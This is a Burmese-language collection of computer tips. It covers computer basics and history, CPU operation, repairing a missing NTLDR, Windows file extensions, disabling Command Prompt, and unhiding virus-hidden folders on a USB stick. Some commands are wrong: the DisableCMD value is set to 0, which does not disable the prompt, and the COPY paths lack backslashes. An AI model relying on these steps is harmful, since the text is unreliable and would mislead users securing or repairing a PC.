၅။ System ကိုကြည့်ရှုလိုပါက S ဟုရိုက်၍ Enter ကိုနှိပ်ရပါမည်။ ထိုအခါ ကွန်ပျူတာ system မှ အသုံးပြုထားသည့် executable file များကိုတွေ့မြင်ရမည်ဖြစ်ပါသည်။
၆။ ကွန်ပျူတာတွင် Install ပြုလုပ်ထားသည့် Software များကို ကြည့်ရှုလိုပါက u (User ၏ အတိုကောတ်) ကိုရိုက်ထည့်၍ Enter ကိုနှိပ်ပြီးကြည့်ရှုနိုင်ပါသည်။
၇။ Install ပြုလုပ်ထားသည့် Software များအနက်မှ Kill ပြုလုပ်လိုသည့် Software ရှိပါက k ဟုရိုက်၍ Kill ပြုလုပ်လိုသည့် Software ၏ PID(Process Identifier) no ကိုရိုက်ပြီးနောက် Enter ကိုနှိပ်ပြီး Kill ပြုလုပ်နိုင်ပါသည်။ PID(Process Identifier) no များကိုပါ ဖော်ပြပေး ထားပါမည်။

သိထားသင့်သော ကွန်ပျူတာအကြောင်း....





 
ကွန်ပျူတာ တစ်လုံး မှာ hardware နဲ့ software ဆိုပြီး နှစ်ပိုင်း ရှိပါတယ်။

Hardware ဆိုတာက အရှင်းဆုံးပြောရရင် လက်နဲ့ကိုင်တွယ်လို့ရတဲ့ ပစ္စည်းတွေဖြစ်ပါတယ်။
ဥပမာ။ ။ monitor၊ mouse   

Software ဆိုတာက လက်နဲ့ကိုင်တွယ်လို့မရတဲ့ ကွန်ပျူတာအသုံးပြု ပစ္စည်းလို့ ပြောရင်လည်းမှန်ပါတယ်။
program များကို စုဆောင်းထားတာကို software လို့ခေါ်ပါတယ်။ software ဆိုတာ ကွန်ပျူတာကို ဘာလုပ်ရမယ်၊ ဘယ်အချိန်မှာ လုပ်ရမလဲဆိုတာ ထိန်းကျောင်းပေးတဲ့ ညွန်ကြားချက် အစုအဝေးလည်းဖြစ်ပါတယ်။ software မပါဘဲ ကွန်ပျူတာ ဘာမှလုပ်လို့မရသလို hardware မပါဘဲနဲ့လည်း ကွန်ပျူတာ ဘာမှ လုပ်လို့ရမှာ မဟုတ်ပါဘူး။

software မှာ နှစ်မျိုးထပ်ခွဲပါသေးတယ်။
၁။ application software
၂။ system software

application software

application software ဆိုတာကတော့ application တွေမှာ အသုံးပြုဖို့ အလုပ်လုပ်ဖို့ user (အသုံးပြုသူ)တွေကို အကူအညီပေးတဲ့ software တွေဖြစ်ပါတယ်။

system software

system software ဆိုတာကတော့ hardware တွေ အလုပ်လုပ်နိုင်ဖို့အတွက်နဲ့ application software တွေ အသုံးပြုနိုင်ရန်အတွက် maintain လုပ်ပေးပါတယ်။

နောက်ပြီး ကွန်ပျူတာမှာ ဂဏန်း နှစ်လုံးနဲ့ဘဲ အလုပ်လုပ်ပါတယ်။ 0 နဲ. 1 ပါ။ Binary number လို့လဲခေါ်ပါတယ်။ Binary Digit ကိန်းလို့လဲခေါ်ဆိုရပါတယ်။ အတိုကောက်ကိုတော့ Bit လို့ခေါ်ပါတယ်။
ဂဏန်းတစ်လုံး၊ စပေ့ဘားတစ်ချက်၊ စာတစ်လုံးကိုဆိုရင် 8 bit လို့ခေါ်ပါတယ်။
01010101 ယခုလို 0 နဲ့ 1 တွေချည်းပါတဲ့ ဂဏန်း 8 လုံးတွဲကို 8 bit လို့ခေါ်ပြီး 8 Bit ဟာ 1 byte နဲ့ ညီမျှပါတယ်။
1 bit (binary digit*) = the value of 0 or 1
8 bits = 1 byte
1024 bytes = 1 kilobyte
1024 kilobytes = 1 megabyte
1024 megabytes = 1 gigabyte
1024 gigabytes = 1 terabyte
1024 terabytes = 1 petabyte
Abbreviations
1 kilobyte = 1 k
1 megabyte = 1 MB
1 gigabyte = 1 GB
1 terabyte = 1 TB
1 petabyte = 1 PB
Size in "bytes"
Kilobyte (KB) = 1,024
Megabyte (MB) = 1,048,576
Gigabyte (GB) = 1,073,741,824
Terabyte (TB) = 1,099,511,627,776
Petabyte (PB) = 1,125,899,906,842,624


ကွန်ပျူတာသမိုင်း
ရှေးယခင်က ကွန်ပျူတာ ကို သတ်မှတ်ဖို့ ရန်အလွန်တရာမှခက်ခဲ ခဲ့ သည်။ယခုအချိန်တွင်မူကွန်ပျူတာကို အမည်အမျိုးမျိုး ခေါ်ဝေါ်သတ်မှတ်ခဲ့ကြပြီဖြစ်သည်။ ယခုအချိန်တွင်မူကိရိယာများ (Devices) တော်တော်များများကို ကွန်ပျူတာ တပ်ပြီးခေါ်နေကြပြီဖြစ်သည်။အစောဆုံး ကွန်ပျူတာ သည် တွက်ချက်မှုပိုင်းကို ပေသီး(Abacus)များမှ စခဲ့သည်။ ပေသီးသည် ပထမဆုံးဂဏန်းပေါင်းစက် ပင်ဖြစ်သည်။ ပေသီးကို တရုတ်ပြည်တွင် စတင်အသုံးပြုခဲ့သည်။

အလယ်ခေတ်အရောက်တွင် ဥရောပ သချာင်္ နှင့် အင်ဂျင်နီယာ ပညာရှင် Wilhelm Schickard က ၁၆၂၃ခုနှစ် တွင် ပထမဆုံး စက်ပစ္စည်းနှင့်တွက်ချက်သောဂဏန်းပေါင်းစက်(Calculators) တစ်ခုကို တည်ဆောက်ခဲ့သည်။သို့သော်လည်းယခုခေတ်တွင် ၎င်း ကိရိယာDevice ကို ကွန်ပျူတာ လို့ခေါ်ဆို၍ မရတော့ပေ။အဘယ်ကြောင့်ဆို သော်၎င်းကိရိယာသည် Programmed ပါဝင်ခြင်းမရှိသောကြောင့်ဖြစ်သည်။ ၁၈၀၁ ခုနှစ် တွင် Joseph Marie Jacquard သည် Textile ယက်ကန်းစက်ကို အခြေခံပြီး Punched Paper Cards Series ကို အသုံးပြုပြီး သူ့၏ ယက်ကန်းစက်ကို အလိုအလျှောက် အလုပ်လုပ်စေခဲ့သည်။ Jacquard ၏ ယက်ကန်းစက်မှ ရလဒ်သည် ကွန်ပျူတာ ဖြစ်ပေါ်တိုးတက်လာစေဖို့ရန် အကြောင်းရင်း တစ်ရပ်ဖြစ်သည်။ ၁၈၃၇ ခုနှစ် တွင် Charles Babbage သည် Programmable Mechanical Computer ကို စတင် Design ရေးဆွဲခဲ့သည်။ Analytical Engine ဟုအမည်ပေးခဲ့သည်။ ၁၈၉၀ ခုနှစ် အရောက် တွင်US Census က Punched Card အတွက် ကြီးမားသော Scale Automated Data Processing စွမ်းဆောင်ရည်ရှိအောင် Tabulating Machines ကို Herman Hollerith က Designed ရေးဆွဲခဲ့သည်။ Computing Tabulating Recording Corporation ( ယခုအခါ IBM ဖြစ်လာသည် ) က ထုတ်လုပ်ခဲ့ပါသည်။

၁၉ ရာစု အကုန်အရောက် တွင်ကွန်ပျူတာ တွေဟာ အသုံးဝင်သောအရာတစ်ခုဖြစ်လာခဲ့သည်။ ကွန်ပျူတာ သည် လူတို့ အတွက်လိုအပ်နေပြီဆိုတာက သက်သေပြလိုက်ပြီးဖြစ်သည်။ အဘယ်ကြောင့်ဆိုသော် Punched Card, Boolean Algebra , The Vacuum Tube (Thermionic Value) နဲ့ Teleprinter တွေဟာ ပေါ်ပေါက်ခဲ့သောကြောင့်ဖြစ်သည်။၂၀ ရာစု အတောအတွင်းတွင် သိပ္ပံပညာသည် များစွာတိုးတက်မှုရှိလာခဲ့ပြီး Analog Computer များလည်း တိုးတက်ပေါ်ပေါက်ခဲ့သည်။ သို့သော်လည်း၎င်း ကွန်ပျူတာများသည် Programmable မဖြစ်သည့်အပြင် အခုခေတ် Digital ကွန်ပျူတာ များ၏ တိကျသော စွမ်းဆောင်ရည် များလည်းပါဝင်ခြင်း မရှိသေးပေ။


ကွန်ပျူတာ အလုပ်လုပ်ပုံ
ယေဘုယျသုံး ကွန်ပျူတာ တွင် အဓိက လေးမျိုးမှာ ဂဏန်း သင်္ချာ နှင့် လော့ဂျစ် အစိတ်အပိုင်း (arithmetic and logic unit)၊ ထိန်းချူပ် အစိတ်အပိုင်း (control unit)၊ မှတ်ဥာဏ်(Memory Device) နှင့် အသွင်း အထုတ် ကိရိယာ (I/O) များတို့ ဖြစ်သည်။ ၄င်း အစိတ်အပိုင်း တို့ကို ဝါယာကြိုးများ အတွဲလိုက်ဖြစ်သော ဘတ်စ် များ ဖြင့် တွယ်ချိတ်ထားသည်။

ထိန်းချုပ်ဌာန

ဗဟိုထိန်းချူပ် ဌာန (control unit, often called a control system or CPU) သို့မဟုတ် စီပီယူ သည် ကွန်ပျူတာ၏ အစိတ်အပိုင်း မျိုးစုံကို လမ်းဆောင်သည်။ ၄င်းသည် ပရိုဂရမ် ၏ ညွှန်ကြားချက်များကို တစ်ကြောင်းခြင်း ဖတ်ရှူ ပြီး အဓိပ္ပါယ် ပြန်သည်။ ထိန်းချူပ် ဌာနသည် အဆင့်မြင့်သော ကွန်ပျူတာများတွင် ၄င်းညွှန်ကြားချက် အစဉ်များကို မြန်ဆန်စေရန်အတွက် ခုန်ကျော် ဖတ်ရှူ ခြင်း လုပ်လေ့ရှိသည်။

ထိန်းချူပ် ဌာန ၏ အဓိက မှာ ပရိုဂရမ် ကောင်တာ၊ နောက် ညွှန်းကြားချက် ကို ဘယ်နေရာမှ ဖက်ရှူမည် ကို မှတ်သားထားသော အထူး သိုလှောင်ရာ ရာဂျစ်စတာ တို့ဖြစ်သည်။
MIPS architecture ၏ ညွှန်ကြားချက် ကို ထိန်းချူပ် ဌာနမှ ဖတ်ရှူပုံ ဖော်ပြသော ပုံကြမ်း


ထိန်းချူပ် ဌာန၏ အလုပ်များမှာ နောက် စီပီယူများတွင် ကွာခြားနိုင်သော်လည်း အခြေခံမှာ အောက်ပါအတိုင်းဖြစ်သည်။
  1. ပရိုဂရမ် ကောင်တာ ညွှန်ပြသော အခန်းမှ လာမည့် ညွှန်ကြားချက် (instruction) ကုဒ်ကို ဖက်ပါ။
  2. ၄င်းညွှန်ကြားချက် ကုဒ်ကို အဓိပ္ပါယ် ပြန်ပြီး အမိန့်ပေးချက် (command) များ သို့မဟုတ် အခြားစက်များ၏ အဝင်လှိုင်း (signal) များ အဖြစ် လုပ်ဆောင်ပါ။
  3. ညွှန်ကြားချက် အသစ်ရေးရန် ပရိုဂရမ် ကောင်တာကို တစ်ခုမြင့်ပါ။
  4. ညွှန်ကြားချက် ပါလျှင် မှတ်ဥာဏ်(Memory Device) အခန်းများမှ အချက်အလက်များကို ဖက်ပါ။ များသောအားဖြင့် ၄င်းဖက်ရှူရမည့် အခန်းနံပါတ်ကို ညွှန်ကြားချက် ကုဒ် ထည်မှာပင် သိမ်းဆီးလေ့ရှိသည်။
  5. ညွှန်ကြားချက် သည် အေအယ်လ်ယူ သို့မဟုတ် အထူးစက်များမှ လုပ်ဆောင်ချက်များ လိုအပ်လျှင် ၄င်းစက်အား မောင်းနှင်ပါ။
  6. အေအယ်လ်ယူမှ အဖြေကို မှတ်ဥာဏ်(Memory Device)တွင်းသို့ ပြန်လည်သိမ်းဆည်းပါ သို့မဟုတ် ပရင့်တာ ကဲ့သို့ ပုံနှိပ်စက် များတွင် ထုတ်ပါ။
  7. အစ အဆင့် (၁) သို့ ပြန်သွားပါ။
ဂဏန်း သင်္ချာ နှင့် လော့ဂျစ် ဌာန
Main articles: Arithmetic logic unit and အေယ်လ်ယူ
ဂဏန်း သင်္ချာ နှင့် လော့ဂျစ် အစိတ်အပိုင်း (Arithmetic and logic unit, ALU) ခေါ် အေယ်လ်ယူ သည် ဂဏန်း သင်္ချာ နှင့် လော့ဂျစ် ဆောင်ရွက်မှု အပိုင်း နှစ်ခု ကိုလုပ်ဆောင်သည်။
ဂဏန်း သင်္ချာ လုပ်ဆောင်မှုတွင် ALU သည် အခြေခံများဖြစ်သည့် အပေါင်း၊ အနုတ်၊ အမြှောက်၊ အစား၊ တြီဂိုနိုမေတြီ ဖန်ရှင်များ နှင့် square root တို့ လုပ်ဆောင်သည်။ အချိုသော လုပ်ဆောင်မှု များမှာ ကိန်းပြည့်များတိုတာ လုပ်ဆောင်နိုင်ပြီး အချိုမှာ တိကျမှု ရော့ကျနိုင်သော်လည်း ဒဿမ ကိန်း (floating point) မှ ကိန်းစစ် (real number) များအထိ လုပ်ဆောင်နိုင်သည်။ သို့သော်၊ မည်သည့် ကွန်ပျူတာမဆို မည်မျှပင် ခက်ခဲသော အလုပ်ဖြစ်ပါစေ တစ်ဆင့်ခြင်း လွယ်ကူသော အဆင့်များအဖြစ် ပြောင်းလည်းစေခြင်းဖြင့် စွမ်းဆောင်နိုင်သည်။ ထို့ကြောင့် မည်သည့် ကွန်ပျူတာမဆို ဘယ်လို ဂဏန်းသင်္ချာပြဿနာမဆို ဖြေရှင်းနိုင်ပြီး ၄င်း၏ အေယ်လ်ယူ က တိုက်ရိုက် ဖြေရှင်၍မရပါက သွယ်ဝိုက်သော်နည်းဖြင့် ဖြေရှင်းနိုင်သည် ။

NTLDR ပျောက်ဆုံးသည့်ပြဿနာ

NTLDR Missing MessageNTLDR ဆိုသည်မှာ NT Loader ရဲ့ အတိုကောက်တစ်ခုဖြစ်ပြီး Windows NT ကို တက်အောင်ကူညီပေးပါသည်။ အကြောင်းအမျိုးမျိုးကြောင့် NTLDR  Program File သည် Hard disk မှ ပျောက်ဆုံးသွားခဲ့ပါက ကွန်ပျူတာကို Window အသစ်တင်သည့်အခါတွင်  Windows တက်လာမည်မဟုတ်ပါ။ Windows XP သည် NTLDR ကို အသုံးပြုထား သည့်အတွက် NTLDR ပျောက်သွားသည့်အခါ Windows XP လည်းတက်လာနိုင်မည် မဟုတ်ပေ။ ထို့ကြောင့် ကွန်ပျူတာတွင် NTLDR ပျောက်ဆုံးသွားပါက Boot လုပ်တဲ့အချိန်တွင်
NTLDR is missing
Press any key to Restart ဟူသော စာတန်းကိုသာမြင်တွေ့ရပြီး Windows တက်လာခြင်း မရှိတော့ပေ။ ထိုသို့ဖြစ်ရခြင်းမှာ-
၁။ Hard Disk ကို BIOS setup ထဲတွင် တိတိကျကျ မကြေငြာထားခြင်း။ Window တင်ရာ တွင် BIOS မှ မှားယွင်းကြေငြာမိခြင်း။
၂။ Boot မလုပ်ပေးနိုင်သော နေရာမှနေ၍ Computer ကို သွား၍ Boot လုပ်ခိုင်းမိခြင်း။
၃။ Boot.ini ဆိုသည့် File အား မှားယွင်းပြီး Configuration လုပ်ထားမိခြင်း။ NTLDR ပျက်ခြင်း နှင့် NTDETECT.COM ဆိုသည့်ဖိုင်နှစ်ခုမှ တစ်ခုပျက်စီးပျောက်ဆုံးသွားခြင်း။
၎။ Hard Disk အသစ်တစ်လုံးအား ကွန်ပျူတာတွင်ထပ်မံ၍ တပ်ဆင်အသုံးပြုထာားမိခြင်း။ Hard Disk အတွင်းရှိ Boot Sector (သို့မဟုတ်) Master Boot Record ပျက်သွားခြင်း။
(၈) Windows XP ကြီးတစ်ခုလုံး ပျက်သွားရခြင်း စသည့်အကြောင်းများကြောင့် ဖြစ်ပါသည်။ အဆိုပါ ပြဿနာကို ဖြေရှင်းရန်အတွက် Window တင်ရာတွင် Window ခွေဖြင့်တစ်ပါတည်း ဖြေရှင်းနိုင်သကဲ့သို့ NTLDR Boot Disk ဖြင့်လည်းဖြေရှင်းနိုင်ပါသည်။ Window ခွေဖြင့် ဖြေရှင်းရန်အတွက် အောက်ပါအတိုင်းပြုလုပ်ပေးရပါမည်-
၁။ ကွန်ပျူတာကိဖွင့်၍ု BIOS မှ First Boot ကို CD ဟုရွေးချယ်ပေး၍ Window ခွေထည့်၍ Window တင်ပေးရပါမည်။ ထို့နောက် အောက်ဖော်ပြပါပုံအတိုင်း Window XP Professional Setup သို့ရောက်ရှိလာပါက Repair ပြုလုပ်ရန်အတွက် Keyboard မှ R ကို နှိပ်ပေးရပါမည်။
NTLDR Missing
NTLDR Missing
၂။ ထို့နောက် 1 ကိုရိုက်၍ Enter ကို နှိပ်ပေးရပါမည်။ ကွန်ပျူတာတွင် Window တင်ထား သည့် C Partition တစ်ခုတည်းရှိသည့်အတွက် 1 ဟု ရိုက်ခြင်းဖြစ်ပါသည်။ ကွန်ပျူတာတွင် Window 2 ခုတင်ထားပါက 2 ဟုရိုက်ပေးရမည်ဖြစ်ပါသည်။
၃။ Administrator Password အသုံးပြုထားပါက ရိုက်နှိပ်ပေးရပါမည်။ Administrator Password အသုံးပြုထားခြင်းမရှိပါက Enter ကိုနှိပ်ပေးရပါမည်။
၎။ NTLDR နှင့် NTDETECT.COM ဆိုသည့် File  နှစ်ခုကို Command Prompt အသုံးပြု၍ CD Drive မှ Hard Disk သို့ ကူးထည့်ပေးရပါမည်။ အောက်ဖော်ပြပါ စာသားများကို အသုံးပြု၍ ကူးထည့်ပေးရပါမည်။
COPY D:I386NTLDR C:
ဟုရိုက်ပြီးနောက် Enter ကို နှိပ်ရပါမည်။ ထိုအခါ 1 File(s) Copied ဟုMessage ကိုတွေ့မြင် ရပါက File ကူးယူခြင်းပြီးဆုံးပြီဖြစ်ပါသည်။ ထို့နောက်ဆက်လက်၍
COPY D:I386NTDETECT.COM C:
ဟုရိုက်ပြီးနောက် Enter ကို နှိပ်ရပါမည်။ 1 File(s) Copied ဟုMessage ကိုတွေ့မြင်ရပါက File ကူးယူခြင်းပြီးဆုံးပြီးဖြစ်ပြီး Window CD ခွေကိုထုတ်၍ ကွန်ပျူတာကို Restart ချပေးရ ပါမည်။ ထိုအခါ NTLDR ပျောက်ဆုံးခြင်းကို ဖြေရှင်းပြီးဖြစ်ပါသည်။
http://www.computerhope.com/issues/ch000465.htm တွင်အသေးစိတ်လေ့လာနိုင်ပါ သည်။

Sysem File Type များ

 System File
System File
ကွန်ပျူတာတွင်အသုံးပြုထားသည့် System File Type များနှင့် ၄င်းတို့၏ File Extension များကို ဗဟုသုတအနေဖြင့်ဖော်ပြလိုက်ပါသည်။ ထိုသို့ သိရှိထားခြင်းဖြင့် ကွန်ပျူတာ System ၏ အရေးကြီးသည့် File များကို မှားယွင်းဖျတ်မိခြင်းမှလည်း ကင်းဝေးစေနိုင်ပါသည်။
Extension- File Description
.adm- Administrative Template File
.ani -Animated Cursor
.ann -Help Annotations
.bmk -Help Bookmarks
.cab -Windows Cabinet File
.cnt -Contents File
.cpl -Windows Control Panel
.cur -Windows Cursor
.desklink- Desktop Shortcut
.dev -Windows Device Driver File
.dmp -Windows Memory Dump
.drv- Device Driver
.dss- DCC Active Designer File
.dvd -DOS Device Driver
.ffa- Find Fast Status File
.ffl- Find Fast Document List
.ffo- Find Fast Document Properties Cache
.ffx- Microsoft Find Fast Index
.fpbf -Mac OS X Burn Folder
.ftg- Full Text Group
.fts- Full Text Search
.grp- Windows Program Manager Group
.hdmp- Windows Heap Dump
.hhc- HTML Help Table of Contents
.hhk- HTML Help Index
.hlp -Windows Help File
.icns -Icon Resource
.ico- Icon File
.idx- Index File
.ini- Initialization File
.ins-Internet Naming Service File
.ion- 4DOS File Description
.its- Internet Document Set
.kbd- Keyboard Layout Script
.kext- Mac OS X Kernel Extension
.key- Security Key
.manifest- Windows Visual Styles File
.mapimail -Send To Mail Recipient
.mdmp- Windows Minidump
.msc- Microsoft Management Console Snap-in Control F
.msp- Windows Installer Patch
.msstyles- Windows XP Style
.mui- MultiLanguage Resource File
.mydocs- Send To My Documents
.nt- Windows NT Startup File
.p7b- PKCS #7 Certificate File
.pdr- Windows Port Driver
.pfx PKCS- #12 Certificate File
.pid- Creative Driver File
.pol- Windows Policy File
.prefpane- Mac OS X System Preference Pane
.prf- Windows System File
.prt -Printer Driver File
.pwl- Windows Password List
.reg- Registry File
.scf- Windows Explorer Command
.scr- Windows Screensaver
.sdb- Custom Application Compatibility Database
.str- Windows Screensaver File
.swp- Swap File
.sys- System File
.sys- Motorola Driver File
.theme -Desktop Theme
.vga- VGA Display Driver
.vgd- Generic CADD VGA Driver
.vxd- Virtual Device Driver
.wdgt- Dashboard Widget
(ချယ်ရီမြေ၀က်ဆိုဒ်မှ ကူးယူဖော်ပြသည်။) 

Command Prompt ကို Disable ပြုလုပ်နည်း(၃)မျိုး

command-prompt
command-prompt
မိမိကွန်ပျူတာကို အခြားတစ်ယောက်အား ခေတ္တငှားရမည့်အခါမျိုးတွင် Command Prompt ကို Disable ပြုလုပ်ထားခြင်းဖြင့် ကွန်ပျူတာကို အတန်အသင့် စိတ်ချလုံခြုံစေနိုင်ပါသည်။ ထို့အပြင် Command Prompt ကိုအသုံးပြု၍ ကွန်ပျူတာကိုကလိခြင်းမှလည်း ကာကွယ် နိုင်ပါသည်။Command Prompt ကို Disable ပြုလုပ်ရန်အတွက်
Start \ Run မှ တစ်ဆင့်အောက်ဖော်ပြပါ စာသားများကို Copy ကူး၍ Ok ကို Click ပေးရပါမည်။ ထိုအခါ Command Prompt ကို Disable ပြုလုပ်ပြီးဖြစ်ပါသည်။
REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
ဒုတိယနည်းမှာ Registry Editor သို့ဝင်ရောက်၍ Command Prompt ကို Disable ပြုလုပ်ခြင်းဖြစ်ပါသည်။
၁။ Register Editor သို့ဝင်ရောက်ရပါမည်။ Start\ Run တွင် regedit ဟုရိုက်နှိပ်၍ Ok ပေးရပါမည်။
၂။ အောက်ဖော်ပြပါ အတိုင်းဝင်ရောက်ရပါမည်-
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
၃။ ထို့နောက် ညာဘက် Pane အတွင်းရှိ DisableCMD ကို Double Click နှိပ်၍ Data တွင် ၀ ဟုပေးရပါမည်။
၎။ Register Editor ကို ပိတ်ပြီးနောက် Command Prompt ကို Disable ပြုလုပ်ပြီးဖြစ်ပါသည်။
နောက်ဆုံးနည်းလမ်းတစ်မျိုးမှာ Group Policy မှတစ်ဆင့် Disable ပြုလုပ်ခြင်းဖြစ်ပါသည်။
၁။ Start \ Run တွင် gpedit.msc ဟုရိုက်၍ Ok ပေးပြီး Group Policy သို့ဝင်ရောက်ရပါမည်။
၂။ User Configuration > Administrative Templates > System သို့ဝင်ရောက်ရပါမည်။
၃။ System Click ပြီးနောက် ညာဘက် Pane အတွင်းရှိ “Prevent access to the command prompt” ကို Double click နှိပ်၍
Disable ကို Check ပေး၍ Ok ပေးရပါမည်။ ထို့နောက် Group Policy ကို ပိတ်ပြီနောက် Command Prompt ကို Disable ပြုလုပ်ပြီး ဖြစ်ပါ သည်။ (ချယ်ရီမြေ၀က်ဆိုဒ်မှ ကူးယူဖော်ပြသည်။)

Memory Stick မှာ Virus ကိုက်လို့ ပျောက်နေတဲ့ File တွေကို ဘယ်လို ပြန်ဖော်မလဲ



ဒီတစ်ခါ ကျွန်တော် တင်ပေးလိုက်တာက…တစ်ခါတစ်လေ memory stick တွေမှာ virus ကိုက်လို့ folder တွေ လုံးဝပျောက်နေတာကို ပြန်ဖော်တဲ့ နည်းလေးပါ။။။။ သိပြီးသားလူတွေလည်း ရှိမှာပါ..ဒါပေမယ့် မသိသေးတဲ့ ဘော်ဘော်တွေ အတွက် ရည်ရွယ်ပြီး တင်ပေးလိုက်တာဖြစ်ပါတယ်….အားလုံး အဆင်ပြေပါစေဗျာ…..:)
ပထမဆုံးအနေနဲ့ memory stick ကို ကွန်ပျူတာနဲ့ ဆက်လိုက်ပါ… ဒီနေရာမှာ တစ်ခု သတိထားရမှာက အဲဒီ stick ကို ဖွင့်တဲ့ အခါ My Computer ကို double click နဲ့ မဖွင့်ဘဲ right click – Open နဲ့ပဲ ဖွင့်ပါ။ ဘာလို့လဲ ဆိုတော့ ပိုပြီး လုံခြုံ အောင်အတွက်ပါ။ပြီးရင် အဲဒီမှာ Organize ဆိုတဲ့ ထဲကို ၀င်လိုက်ပါ..ပြီးရင် အဲဒီထဲကပဲ Folder and search options ကို တစ်ချက်နှိပ်လိုက်ပါ…အဲဒါကို တစ်ချက်နှိပ်လိုက်တာနဲ့ Folder Options ဆိုတဲ့ box လေးတစ်ခု ကျလာလိမ့်မယ်….အဲဒီထဲက view ဆိုတာကို တစ်ချက်နှိပ်လိုက်ပါ…..ပြီးရင် show hidden files,…..ဆိုဒါကို တစ်ချက်နှိပ်လိုက်ပါ …ပြီးရင် အောက်က Hide extensions for ….. ဆိုတဲ့စာကြောင်းလေးနဲ့ Hide protect Opera….. ဆိုတာလေးက tick လေးကို ဖြုတ်ပေးလိုက်ပါ………….Yes လုပ်ပြီး OK လုပ်လိုက်ပါ။။။။
ကဲ ပထမ တစ်ဆင့်တော့ ပြီးသွားပြီ… ဇာတ်လမ်းက ခုမှ စမှာ……ကဲပြီးတာနဲ့ Run box ကို ဖွင့်လိုက်ပါ။( Window key + R ကိုတွဲနှိပ်လိုက်ပါ။) ပြီးရင် အဲဒီမှာ cmd ဆိုပြီး ရိုက်ထည့် ပြီးရင် Enter ခေါက်လိုက်ပါ။ cmd box လေး ကျလာပါလိမ့်မယ်။
ပြီးရင် အဲဒီမှာ ကိုယ့် memory stick ကို ရိုက်ထည့်လိုက်ပါ။ (ဥပမာ---F: , G: , D: , …. ) ကျွန်တော်က တော့ ကျွန်တော့ stick က G: မို့လို့ G: လို့ ရိုက်ထည့်ထားပါတယ်။ ပြီးရင် Enter ခေါက်လိုက်ပါ။အဲဒီခါကျရင် …..attrib (folder နာမည်) –s –h ဆို ပြီးရိုက်ထည့် ပြီးရင် Enter ခေါက်လိုက်ပါ။ အကယ်၍ ဒီနေရာမှာ မိမိ folder ရဲ့ name မှာ space ခြားတာတို့ ပါနေ ရင် attrib “romantic hacker” –s –h ဆိုပြီးရေးရပါမယ်။အဲဒါဆိုရင် အဲဒီ memory stick ထဲကပျောက်နေတဲ့ folder ပြန်ပေါ်လာတာကို တွေ့ရပါလိမ့်မယ်….အားလုံး အဆင်ပြေပါစေ…